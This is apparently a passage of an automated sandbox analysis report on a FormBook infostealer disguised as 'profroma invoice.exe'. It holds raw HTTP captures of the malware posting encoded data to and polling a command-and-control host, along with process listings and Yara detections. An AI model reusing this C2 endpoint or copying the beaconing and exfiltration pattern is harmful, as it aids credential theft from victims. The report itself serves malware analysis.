                                                        Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {height: 100%;font-size: 14px;}.container {display: flex;flex-direction: column;align-items: center;height: 100%;padding-top: 12%;}.logo img { display: block; width: 100px;}.logo img + img { margin-top: 12px;}.title {margin-top: 24px;font-size: 110px;color: #333;letter-spacing: 10px;}.desc {font-size: 16px;color: #777;text-align: center;line-height: 24px;}.footer {/* position: absolute;left: 0;bottom: 32px;width: 100%; */margin-top: 24px;text-align: center;font-size: 12px;}.footer .btlink {color: #20a53a;text-decoration: no [TRUNCATED]
                                                        Dec 14, 2024 13:59:15.377388000 CET1236INData Raw: 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 0a 09 09 09 09 3c 69 6d 67 20 73 72 63 3d
                                                        Data Ascii: le></head><body><div class="container"><div class="logo"><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAASwAAAEDCAYAAACPhzmWAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAAt+wAALfsB/IdK5wAAABx0RVh0U29mdHdhcmUAQWRvYmUgRmlyZXdvcmtzIE
                                                        Dec 14, 2024 13:59:15.377425909 CET1236INData Raw: 59 37 33 42 72 51 47 72 32 75 44 72 39 4a 4f 4a 78 57 47 36 45 41 56 30 42 42 4f 51 37 78 46 39 4c 54 35 35 38 66 2b 69 52 48 56 59 6d 78 51 41 41 7a 32 46 47 7a 55 70 38 38 31 31 37 7a 44 64 70 54 4c 74 64 45 50 41 31 67 4a 4b 46 4e 46 66 6c 4d
                                                        Data Ascii: Y73BrQGr2uDr9JOJxWG6EAV0BBOQ7xF9LT558f+iRHVYmxQAAz2FGzUp88117zDdpTLtdEPA1gJKFNFflMXT5CYVVBMAXOChkWczTlx/Zse+bjq9aD5/Y3yLbYolkAIhw6Y3m2u/gzw0FEJjvGgKox2Pr9hOIx2G5EQJeL3jMIoldD934ptP9nKyRAT5c2IEY0+SVW00j4Uf7QDZHUVo3dvUJh4qcxjGwBtcz06NX9h7x+YauPa
                                                        Dec 14, 2024 13:59:15.377460003 CET1236INData Raw: 4f 41 41 41 45 4a 50 31 79 63 4b 63 4a 6e 4b 49 52 31 68 6b 32 50 54 62 58 6c 73 47 79 49 2b 4d 46 41 42 38 44 47 50 33 62 31 51 73 6a 62 71 65 6e 70 56 51 4e 4c 4e 45 6e 6e 30 6b 75 67 45 4f 4e 56 33 54 36 4e 4c 35 50 39 42 59 46 39 2f 7a 58 38
                                                        Data Ascii: OAAAEJP1ycKcJnKIR1hk2PTbXlsGyI+MFAB8DGP3b1QsjbqenpVQNLNEnn0kugEONV3T6NL5P9BYF9/zX8dzyjk2IaBKANsi386rV0BEM9WoOwhoa224FgOksKjbDTnNHAdhMYGYM/jX9vFVbwOylS1VW0H0PDuCZErqeirZOEiF57flzAkBKFmSP2jq57Mj4MgDWQRb4C86yWNol7z0SIzGWmM9MC1maZlPjFZ0mNS5DCm7776
                                                        Dec 14, 2024 13:59:15.377496958 CET1236INData Raw: 33 36 30 2b 5a 2b 38 34 72 4f 35 5a 44 78 66 58 4a 64 79 71 4c 4d 61 53 6c 5a 62 44 55 4e 4d 5a 53 62 67 4f 4a 49 42 67 41 48 46 50 51 6a 33 38 63 63 31 71 38 57 45 48 67 2b 4a 6b 41 4b 79 73 42 51 59 77 78 2f 37 4e 4a 31 2f 33 42 6d 42 38 67 6a
                                                        Data Ascii: 360+Z+84rO5ZDxfXJdyqLMaSlZbDUNMZSbgOJIBgAHFPQj38cc1q8WEHg+JkAKysBQYwx/7NJ1/3BmB8gj2RvZKRfZosnPksjZn4CjfC/IpoSQPiSxrZrxqJi84co2C09n2ayBoPnLtgx4wHySFu7EM8algthDCrYeAjIUdKqVHjpSihoruB0bRyAdjbsTXVLBwynwU1aQCX0KXDOG4RyINQBh5bg0A1gZRX04R+JxJiXRRJ7WC
                                                        Dec 14, 2024 13:59:15.377656937 CET1236INData Raw: 45 47 48 76 61 58 36 4d 74 67 61 79 63 62 51 6a 77 66 61 48 49 68 69 54 70 36 6a 73 64 47 32 68 45 53 61 70 67 36 33 35 61 67 56 2f 54 72 65 59 59 49 36 70 47 37 34 48 39 68 38 2f 50 45 4e 47 58 7a 64 68 70 64 78 72 31 62 79 49 37 4f 33 75 6b 6c
                                                        Data Ascii: EGHvaX6MtgaycbQjwfaHIhiTp6jsdG2hESapg635agV/TreYYI6pG74H9h8/PENGXzdhpdxr1byI7O3ukl5cXB2CoHVP+TnrOcrZ+Y3X6qPeH8NetLNSKqCxupZQq46PbnZZrCS/qgaEV+F1vrvo5CH7etopNmKFgAf+/isGo9wfQBEBjyAn4tX01qutq4LO2cze+Al/tWRCLc6RNhxzW5vNfq37sOpz/IHpR+oYrJz4OVKnHvl
                                                        Dec 14, 2024 13:59:15.377693892 CET1236INData Raw: 30 6b 74 69 74 4f 31 6e 5a 52 55 34 31 41 6e 79 30 6f 36 68 39 78 61 72 51 71 76 56 32 75 6a 4f 43 52 63 55 2b 4d 53 58 75 2b 34 56 45 33 67 66 77 49 65 77 49 38 42 46 42 65 7a 55 70 59 7a 6c 62 64 66 77 49 54 4e 62 4a 6a 78 68 77 56 47 58 39 7a
                                                        Data Ascii: 0ktitO1nZRU41Any0o6h9xarQqvV2ujOCRcU+MSXu+4VE3gfwIewI8BFBezUpYzlbdfwITNbJjxhwVGX9zuOltCq+0B1FjcDHfDnhRy8QNbHTJbs5if8mDEZ9OYNRP9Bg1D9wUpMhT//+rMHJkFdoRa1aXkrwDflg0da0syUCDkKrHgJCDHKkgQDWALjGFsXtcLQPTqUNEGi2VRL7rz+zYkOT4BqvH7v/R1U1J7xYQuu9ctedy+
                                                        Dec 14, 2024 13:59:15.377728939 CET1236INData Raw: 36 52 76 59 75 2b 41 65 52 44 4e 67 75 7a 63 55 59 2f 4f 4a 76 2f 64 45 52 5a 32 35 75 42 41 72 6b 6d 6c 6e 45 61 36 66 47 39 46 53 4c 44 41 55 6c 66 4b 2b 39 58 72 66 50 44 41 78 70 4d 51 70 45 54 39 74 6f 66 69 2f 6b 33 4d 4d 6e 6d 76 34 68 6e
                                                        Data Ascii: 6RvYu+AeRDNguzcUY/OJv/dERZ25uBArkmlnEa6fG9FSLDAUlfK+9XrfPDAxpMQpET9tofi/k3MMnmv4hn24B8L09O8YQvOLoge/Zgv0/wWJd/OcJgXua2pQL1grcQzmLVQK9tmBAozbgyN4sIAF2Pgf/JAxGfXWDUT8VQDyIZkCuXG0XH412yrg2jUNeWrCpIgQ6AY2q70MGAnrgkiUbalqXd+QkJGxwtp/FyiVkYAvk38CllD
                                                        Dec 14, 2024 13:59:15.377768040 CET1169INData Raw: 30 65 69 6d 74 39 35 73 45 63 6d 51 4c 75 43 53 41 4b 5a 43 6e 69 76 30 4e 52 6e 76 68 53 49 38 62 64 67 35 32 67 67 59 4a 51 49 6f 70 74 79 30 34 64 68 4a 67 63 6a 49 75 59 36 6e 59 66 66 31 79 75 6b 6e 38 4d 78 6a 55 56 36 50 36 58 39 32 67 49
                                                        Data Ascii: 0eimt95sEcmQLuCSAKZCniv0NRnvhSI8bdg52ggYJQIopty04dhJgcjIuY6nYff1yukn8MxjUV6P6X92gIefgo4uyc9MtLCp2d3F7/l+jX0jkFcghM3ZhjNX47ljMAjZ37yyIUgw4rs2E3Ue8tCr+AAGoEei3FcQ9i3xxR0WQC7CTxe27qzEY9S9BwHYAXwKorvQ6AtLK+Og++lCytq8++Yd2KOW/t8iHJ2E/Gqu608BQAwhv5T
                                                        Dec 14, 2024 13:59:15.377808094 CET1236INData Raw: 7a 77 5a 37 2b 38 64 38 65 6d 54 62 6b 43 56 6e 39 6f 79 74 34 68 50 55 68 69 4f 79 47 37 46 63 67 50 6f 41 66 6a 49 59 39 58 4d 4e 52 72 30 53 37 58 53 33 49 44 47 32 45 34 44 64 70 2b 79 31 31 49 77 75 57 48 7a 30 49 42 69 37 41 59 76 31 35 74
                                                        Data Ascii: zwZ7+8d8emTbkCVn9oyt4hPUhiOyG7FcgPoAfjIY9XMNRr0S7XS3IDG2E4Ddp+y11IwuWHz0IBi7AYv15tHbV54C4NO8cvD7NLhJKAT+LTtN/AFIReclepCx4iBk9RBFWESpzfH6T41lq08fzbXmHGtXJSIWvrpXFFxqBsNO5ztaPPLUEyYA2AYgzJFrOaJrlQJ9eizdd/b9976O7ozaFY6A4+yn0HD4CL9l7oA39xvk9eWHYfj
                                                        Dec 14, 2024 13:59:15.497250080 CET1236INData Raw: 77 56 67 72 42 57 30 66 77 32 4d 4d 47 44 55 59 39 59 30 68 72 31 57 39 36 38 68 31 52 44 68 52 33 73 2f 72 2b 59 6a 58 5a 34 36 70 47 50 6d 64 48 76 55 72 6e 77 4c 48 32 55 76 6d 7a 6f 38 52 2f 6c 78 33 65 72 2f 4e 43 79 44 59 69 67 39 4d 42 6d
                                                        Data Ascii: wVgrBW0fw2MMGDUY9Y0hr1W968h1RDhR3s/r+YjXZ46pGPmdHvUrnwLH2Uvmzo8R/lx3er/NCyDYig9MBmCzmIejuNRhvd1gWCLkLO8iMYnW4evOfVXiQtrNDwA4FHcl69Uk0AAAIABJREFUcPygav4l90Ye3VJ7Ytsv2mp4YTgcy9eqAGBVnmSz2yvydqkZbgVTNH+vd/ZWQi0AoLHtuoLwLoA0yA7vNOQ3fSvkOJpvAMyBXOJ


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        19192.168.2.550000129.226.153.85803576C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 14, 2024 13:59:16.543004036 CET1722OUTPOST /pfw9/ HTTP/1.1
                                                        Accept: */*
                                                        Accept-Encoding: gzip, deflate, br
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.1qcczjvh2.autos
                                                        Cache-Control: max-age=0
                                                        Connection: close
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Content-Length: 1244
                                                        Origin: http://www.1qcczjvh2.autos
                                                        Referer: http://www.1qcczjvh2.autos/pfw9/
                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                        Data Raw: 4f 56 6c 64 47 4a 77 3d 31 37 4e 5a 56 42 4c 76 68 31 67 34 46 53 77 6e 6c 71 38 4f 35 37 54 4c 7a 51 72 6f 79 59 73 53 6f 70 61 63 65 67 64 62 59 58 6e 79 77 4d 6f 42 34 48 53 47 6f 43 34 4e 66 55 44 4b 78 34 65 69 7a 73 6f 52 4f 38 46 31 53 5a 6b 49 49 4a 4a 39 4d 62 69 4a 48 6d 31 4b 56 6d 31 42 51 35 72 32 66 76 6b 6d 47 47 39 32 47 68 35 32 4a 6a 70 77 51 75 4f 65 35 6f 6b 65 71 68 49 42 47 67 33 58 6f 47 4e 4f 76 47 4d 55 42 7a 67 42 6a 41 4e 4a 56 79 38 70 73 43 32 41 4a 6b 6b 6c 59 42 4a 61 46 2b 6d 56 72 48 39 4a 35 31 30 6c 51 62 4f 5a 72 6c 34 34 53 6f 63 71 56 2f 6e 65 6d 47 55 6a 5a 6e 62 42 33 55 52 59 72 70 63 72 79 68 73 68 57 53 70 69 54 4f 4f 34 70 64 64 34 4c 35 52 7a 31 67 36 6e 4e 4d 71 79 63 34 42 46 66 65 63 6b 77 78 53 63 37 79 54 37 6d 6f 50 41 57 77 6e 64 50 63 65 6e 50 41 4e 44 76 42 37 58 48 75 39 52 41 46 41 52 31 6e 4f 75 64 46 41 61 6e 79 61 6e 55 6f 33 37 66 51 63 59 65 36 37 53 2f 46 44 39 39 56 56 32 6d 4c 6a 57 72 47 4c 55 6c 54 58 66 5a 41 39 48 46 47 43 2b 68 6d [TRUNCATED]
                                                        Data Ascii: OVldGJw=17NZVBLvh1g4FSwnlq8O57TLzQroyYsSopacegdbYXnywMoB4HSGoC4NfUDKx4eizsoRO8F1SZkIIJJ9MbiJHm1KVm1BQ5r2fvkmGG92Gh52JjpwQuOe5okeqhIBGg3XoGNOvGMUBzgBjANJVy8psC2AJkklYBJaF+mVrH9J510lQbOZrl44SocqV/nemGUjZnbB3URYrpcryhshWSpiTOO4pdd4L5Rz1g6nNMqyc4BFfeckwxSc7yT7moPAWwndPcenPANDvB7XHu9RAFAR1nOudFAanyanUo37fQcYe67S/FD99VV2mLjWrGLUlTXfZA9HFGC+hmun/WHXdSwn5NWDDoCrCQeqfBUxu7xwdlUkPriBTMFW/qZqxn+bgFGSd5dNkZZe/CceefCsXzBAbe4sG8e3EGTYO/aEf6i4OxFLZYqHyymQV1uRNVHzuwl8XbQJ7E/mjyBtHU3Y7NxOUPZ4dQ4JqRYCV9E6YQ+7NQ5GTPEIWKevPbA4L5iehBNObBBHInqFXU5QTDPuIEUPWkGqZjr9qNtab4Sq69GSLK9ibcQS0BBuq5ug66cHbK8UkO6lmw7ixaMyMKPWQUpDNmldJqJI1hxO2X0Uc2SwhnOXuWPrnT3zbGwxDlPQKTZk489XmR1dgdypCSvrJ5TYMP/0LF6IsRyqA4lIrIxUm1/F1CSaraBvnfhTI9T3KjeOysN3Uo4/o0INyRhcI1D5VBfhvXyRN+1W55exGJpseP0EYROW4FAfCRnqLgOnNiy4gOd2VwXd1w/bNu4C4RguaUYHd4C0vAdivA5s8+VzyJmvsbMN9WFoeE1unw9mgufjgeWJEkuEnSf6JZpn7HQtuOvoE+FSkc1HG9nwzMXSyxCeFfJV/YzQcj6eOYd+NBpdnnAqt2hs93IHimyTyQHaUxu+/KOjjVOlBghd2/XJ3k+XLPAByACidyfeDe6B/sTjCXhmxxT86FjfqEsQzj3POzcV6cAcDEfc/aAfYAt9mJEj [TRUNCATED]


                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                        20192.168.2.550001129.226.153.85803576C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exe
                                                        TimestampBytes transferredDirectionData
                                                        Dec 14, 2024 13:59:19.200544119 CET426OUTGET /pfw9/?OVldGJw=45l5W170mEENNSUkva5u0oLDjn7a85Be/JClWAxqTX/Xh+MpzQee3AwDIBzH94Waz7MWeOxtR7oNILZ5PKGZDC0jYAJATZz8bqUDD2VUfBcYMm5ScOmty60G6hY6HDPa2g==&OP=QXZPwDNH0BG0ttd0 HTTP/1.1
                                                        Accept: */*
                                                        Accept-Language: en-US,en;q=0.9
                                                        Host: www.1qcczjvh2.autos
                                                        Connection: close
                                                        User-Agent: Mozilla/5.0 (Linux; Android 4.2.2; SPH-L720 Build/JDQ39) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.84 Mobile Safari/537.36
                                                        Dec 14, 2024 13:59:20.732908010 CET1236INHTTP/1.1 404 Not Found
                                                        Server: Tengine
                                                        Date: Sat, 14 Dec 2024 12:59:20 GMT
                                                        Content-Type: text/html; charset=utf-8
                                                        Content-Length: 58296
                                                        Connection: close
                                                        Vary: Accept-Encoding
                                                        ETag: "675bd032-e3b8"
                                                        Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 2f 3e 0a 09 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 73 74 79 6c 65 3e 0a 09 09 09 2a 20 7b 0a 09 09 09 09 6d 61 72 67 69 6e 3a 20 30 3b 0a 09 09 09 09 70 61 64 64 69 6e 67 3a 20 30 3b 0a 09 09 09 09 62 6f 78 2d 73 69 7a 69 6e 67 3a 20 62 6f 72 64 65 72 2d 62 6f 78 3b 0a 09 09 09 7d 0a 09 09 09 68 74 6d 6c 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 7d 0a 09 09 09 62 6f 64 79 20 7b 0a 09 09 09 09 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 09 09 09 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 34 70 78 3b 0a 09 09 09 7d 0a 09 09 09 2e 63 6f [TRUNCATED]
                                                        Data Ascii: <!doctype html><html><head><meta charset="utf-8" /><meta name="viewport" content="width=device-width, initial-scale=1.0" /><title>404 Not Found</title><style>* {margin: 0;padding: 0;box-sizing: border-box;}html {height: 100%;}body {height: 100%;font-size: 14px;}.container {display: flex;flex-direction: column;align-items: center;height: 100%;padding-top: 12%;}.logo img { display: block; width: 100px;}.logo img + img { margin-top: 12px;}.title {margin-top: 24px;font-size: 110px;color: #333;letter-spacing: 10px;}.desc {font-size: 16px;color: #777;text-align: center;line-height: 24px;}.footer {/* position: absolute;left: 0;bottom: 32px;width: 100%; */margin-top: 24px;text-align: center;font-size: 12px;}.footer .btlink {color: #20a53a;text-decoration: no [TRUNCATED]
                                                        Dec 14, 2024 13:59:20.732980967 CET1236INData Raw: 6c 65 3e 0a 09 3c 2f 68 65 61 64 3e 0a 09 3c 62 6f 64 79 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6c 6f 67 6f 22 3e 0a 09 09 09 09 3c 69 6d 67 20 73 72 63 3d
                                                        Data Ascii: le></head><body><div class="container"><div class="logo"><img src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAASwAAAEDCAYAAACPhzmWAAAABHNCSVQICAgIfAhkiAAAAAlwSFlzAAAt+wAALfsB/IdK5wAAABx0RVh0U29mdHdhcmUAQWRvYmUgRmlyZXdvcmtzIE
                                                        Dec 14, 2024 13:59:20.733110905 CET1236INData Raw: 59 37 33 42 72 51 47 72 32 75 44 72 39 4a 4f 4a 78 57 47 36 45 41 56 30 42 42 4f 51 37 78 46 39 4c 54 35 35 38 66 2b 69 52 48 56 59 6d 78 51 41 41 7a 32 46 47 7a 55 70 38 38 31 31 37 7a 44 64 70 54 4c 74 64 45 50 41 31 67 4a 4b 46 4e 46 66 6c 4d
                                                        Data Ascii: Y73BrQGr2uDr9JOJxWG6EAV0BBOQ7xF9LT558f+iRHVYmxQAAz2FGzUp88117zDdpTLtdEPA1gJKFNFflMXT5CYVVBMAXOChkWczTlx/Zse+bjq9aD5/Y3yLbYolkAIhw6Y3m2u/gzw0FEJjvGgKox2Pr9hOIx2G5EQJeL3jMIoldD934ptP9nKyRAT5c2IEY0+SVW00j4Uf7QDZHUVo3dvUJh4qcxjGwBtcz06NX9h7x+YauPa
                                                        Dec 14, 2024 13:59:20.733164072 CET1236INData Raw: 4f 41 41 41 45 4a 50 31 79 63 4b 63 4a 6e 4b 49 52 31 68 6b 32 50 54 62 58 6c 73 47 79 49 2b 4d 46 41 42 38 44 47 50 33 62 31 51 73 6a 62 71 65 6e 70 56 51 4e 4c 4e 45 6e 6e 30 6b 75 67 45 4f 4e 56 33 54 36 4e 4c 35 50 39 42 59 46 39 2f 7a 58 38
                                                        Data Ascii: OAAAEJP1ycKcJnKIR1hk2PTbXlsGyI+MFAB8DGP3b1QsjbqenpVQNLNEnn0kugEONV3T6NL5P9BYF9/zX8dzyjk2IaBKANsi386rV0BEM9WoOwhoa224FgOksKjbDTnNHAdhMYGYM/jX9vFVbwOylS1VW0H0PDuCZErqeirZOEiF57flzAkBKFmSP2jq57Mj4MgDWQRb4C86yWNol7z0SIzGWmM9MC1maZlPjFZ0mNS5DCm7776
                                                        Dec 14, 2024 13:59:20.733253002 CET896INData Raw: 33 36 30 2b 5a 2b 38 34 72 4f 35 5a 44 78 66 58 4a 64 79 71 4c 4d 61 53 6c 5a 62 44 55 4e 4d 5a 53 62 67 4f 4a 49 42 67 41 48 46 50 51 6a 33 38 63 63 31 71 38 57 45 48 67 2b 4a 6b 41 4b 79 73 42 51 59 77 78 2f 37 4e 4a 31 2f 33 42 6d 42 38 67 6a
                                                        Data Ascii: 360+Z+84rO5ZDxfXJdyqLMaSlZbDUNMZSbgOJIBgAHFPQj38cc1q8WEHg+JkAKysBQYwx/7NJ1/3BmB8gj2RvZKRfZosnPksjZn4CjfC/IpoSQPiSxrZrxqJi84co2C09n2ayBoPnLtgx4wHySFu7EM8algthDCrYeAjIUdKqVHjpSihoruB0bRyAdjbsTXVLBwynwU1aQCX0KXDOG4RyINQBh5bg0A1gZRX04R+JxJiXRRJ7WC
                                                        Dec 14, 2024 13:59:20.733299971 CET1236INData Raw: 65 64 2f 57 4f 44 49 47 6a 30 37 62 61 6c 42 67 72 55 7a 55 6f 4b 42 74 79 67 47 39 52 69 46 42 51 6a 65 64 4a 5a 4f 58 4a 79 55 56 56 48 62 4b 4a 77 77 36 72 35 71 49 32 76 6b 45 71 72 65 2f 51 70 73 30 47 54 34 34 64 2f 70 37 42 71 50 63 6b 65
                                                        Data Ascii: ed/WODIGj07balBgrUzUoKBtygG9RiFBQjedJZOXJyUVVHbKJww6r5qI2vkEqre/Qps0GT44d/p7BqPckeOYhMTEbcrJxUeQwBjOIsx3SwHC7XFj9dJNVqmhnAUQM8PIaQT2eeQYa1YcKurgGsBZW/PNfSb+QyGmQ8yhtQgBMVuvILZc+7YxzN98Be2RD4y84qrbn0lVvnZrfZ6tNBuimtw+1gjFba1hWyClWHgAYjPqyk2KHv/
                                                        Dec 14, 2024 13:59:20.733335018 CET1236INData Raw: 6c 32 32 7a 70 75 48 76 77 32 46 78 59 78 56 31 46 47 75 57 59 4c 77 56 35 71 63 6f 79 68 6b 4b 6a 70 41 6b 34 39 32 72 74 43 58 50 78 65 74 50 78 41 4e 6b 53 44 45 77 45 38 41 36 4c 4d 74 72 57 62 66 6f 50 30 43 39 6b 68 67 6c 41 58 77 42 6e 37
                                                        Data Ascii: l22zpuHvw2FxYxV1FGuWYLwV5qcoyhkKjpAk492rtCXPxetPxANkSDEwE8A6LMtrWbfoP0C9khglAXwBn7dkmZ5s+M16fUQ1Xkt5AYaEOPN9s6YxNKQU+y3+d5rgDi09cyIBO3cXOrewlR/9rMRj1jQ1G/STIM6kYAJ9CDmz+c32W57i7Zf10PZYu3dqvbOSPo1DSdyNU3O+4J84Ej1XgsIMt2OWQEq7DDuvdBsMuikzaFnvr2M
                                                        Dec 14, 2024 13:59:20.733371019 CET1236INData Raw: 37 6f 4b 47 4b 34 35 56 55 31 57 30 43 34 44 4d 41 38 51 61 6a 2f 6e 4f 44 55 56 2b 72 47 50 33 37 75 37 67 46 32 38 47 45 73 45 70 69 62 57 42 48 4a 65 53 61 43 73 71 61 41 4d 44 64 75 6d 57 44 30 36 30 53 65 32 53 71 37 4b 39 52 7a 58 67 36 6f
                                                        Data Ascii: 7oKGK45VU1W0C4DMA8Qaj/nODUV+rGP37u7gF28GEsEpibWBHJeSaCsqaAMDdumWD060Se2Sq7K9RzXg6oO8dBQvtkSwq9j81HXGEfiGRmQxstBLbTJN5GVsRKSI9+6OHTghcYyAslee5iw8OEQCNIOwhChXB8/Z2ZkUA1xzt+9+NwagvZ4gdPgry4vkiAG1RhKrrAwSeO9uobGCofu2ByS1nbpiGQO+1IHqwpGGFF72Eq5Y6EL
                                                        Dec 14, 2024 13:59:20.733407021 CET1236INData Raw: 7a 69 39 62 50 43 74 6f 54 34 4f 32 76 31 73 32 39 6d 70 6d 79 59 66 36 4a 75 43 4f 39 79 34 66 55 35 6f 6e 37 7a 51 48 39 44 56 2f 49 32 39 5a 37 44 55 62 39 42 49 4e 52 62 33 4d 52 38 47 2f 6b 42 47 7a 4c 7a 49 41 42 35 64 56 6d 56 67 33 33 6b
                                                        Data Ascii: zi9bPCtoT4O2v1s29mpmyYf6JuCO9y4fU5on7zQH9DV/I29Z7DUb9BINRb3MR8G/kBGzLzIAB5dVmVg33kn/Jd9iM5Izr11Mz86/dWRpWLPExhTd/GQLfzUaTJshVZDw8zFwUIjddCMKeKwmr2LLZx5GVK69/qfjnPtt0KIUDLgBASS/1byinrQgim5Wh87BZU/LvwrBNrzUY9R8C2A/CFCgYUQF5Uyai3W83rNZw6JIta5cdvr
                                                        Dec 14, 2024 13:59:20.733444929 CET273INData Raw: 63 32 35 37 38 74 48 2f 4a 46 69 71 65 6e 2b 64 67 4e 33 53 51 30 33 35 69 44 55 61 39 72 62 57 65 78 38 55 65 46 41 78 5a 4b 41 41 44 31 46 65 53 6a 33 5a 43 56 73 34 4f 79 4f 4c 4b 64 7a 4b 74 50 77 5a 62 52 61 6d 79 77 4e 47 4a 31 32 70 50 57
                                                        Data Ascii: c2578tH/JFiqen+dgN3SQ035iDUa9rbWex8UeFAxZKAAD1FeSj3ZCVs4OyOLKdzKtPwZbRamywNGJ12pPWII6FeeBiq51mMfX7GuPv7LDCtgJ6P0LVmLP1btrjjd5+jukZMb9kZJ+tYyf17wriekh4Dgl5ef/9qm5wahvDmAz5HVNxWu9DIBG4FdVLeHXYtiMtXtodNh2aFX/A8FWHU0TeOqJC2YTBPoRj5ZVO4pC/IMzuE4imb
                                                        Dec 14, 2024 13:59:20.853797913 CET1236INData Raw: 7a 77 5a 37 2b 38 64 38 65 6d 54 62 6b 43 56 6e 39 6f 79 74 34 68 50 55 68 69 4f 79 47 37 46 63 67 50 6f 41 66 6a 49 59 39 58 4d 4e 52 72 30 53 37 58 53 33 49 44 47 32 45 34 44 64 70 2b 79 31 31 49 77 75 57 48 7a 30 49 42 69 37 41 59 76 31 35 74
                                                        Data Ascii: zwZ7+8d8emTbkCVn9oyt4hPUhiOyG7FcgPoAfjIY9XMNRr0S7XS3IDG2E4Ddp+y11IwuWHz0IBi7AYv15tHbV54C4NO8cvD7NLhJKAT+LTtN/AFIReclepCx4iBk9RBFWESpzfH6T41lq08fzbXmHGtXJSIWvrpXFFxqBsNO5ztaPPLUEyYA2AYgzJFrOaJrlQJ9eizdd/b9976O7ozaFY6A4+yn0HD4CL9l7oA39xvk9eWHYfj


                                                        Statistics

                                                        CPU Usage

                                                        Click to jump to process

                                                        Memory Usage

                                                        Click to jump to process

                                                        High Level Behavior Distribution

                                                        Click to dive into process behavior distribution

                                                        Behavior

                                                        Click to jump to process

                                                        System Behavior

                                                        General

                                                        Target ID:0
                                                        Start time:07:56:16
                                                        Start date:14/12/2024
                                                        Path:C:\Users\user\Desktop\profroma invoice.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\profroma invoice.exe"
                                                        Imagebase:0xe00000
                                                        File size:837'632 bytes
                                                        MD5 hash:17EA16C0677C90F27FADDB659598F8F2
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:4
                                                        Start time:07:56:38
                                                        Start date:14/12/2024
                                                        Path:C:\Users\user\Desktop\profroma invoice.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Users\user\Desktop\profroma invoice.exe"
                                                        Imagebase:0xcc0000
                                                        File size:837'632 bytes
                                                        MD5 hash:17EA16C0677C90F27FADDB659598F8F2
                                                        Has elevated privileges:true
                                                        Has administrator privileges:true
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2811552200.0000000001B40000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2807926965.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                        • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000004.00000002.2808844558.0000000001690000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                        Reputation:low
                                                        Has exited:true

                                                        General

                                                        Target ID:6
                                                        Start time:07:57:22
                                                        Start date:14/12/2024
                                                        Path:C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exe
                                                        Wow64 process (32bit):true
                                                        Commandline:"C:\Program Files (x86)\HAaToRgyrmRvtfkVNZQuRHzLRFEVcBsTKdDPafwQvfEqyYcGlfRNvIHxaMcyNTRwPAytrGyvmzvtvSNv\vEErKBMCpBGs.exe"
                                                        Imagebase:0x600000
                                                        File size:140'800 bytes
                                                        MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                        Has elevated privileges:false
                                                        Has administrator privileges:false
                                                        Programmed in:C, C++ or other language
                                                        Yara matches:
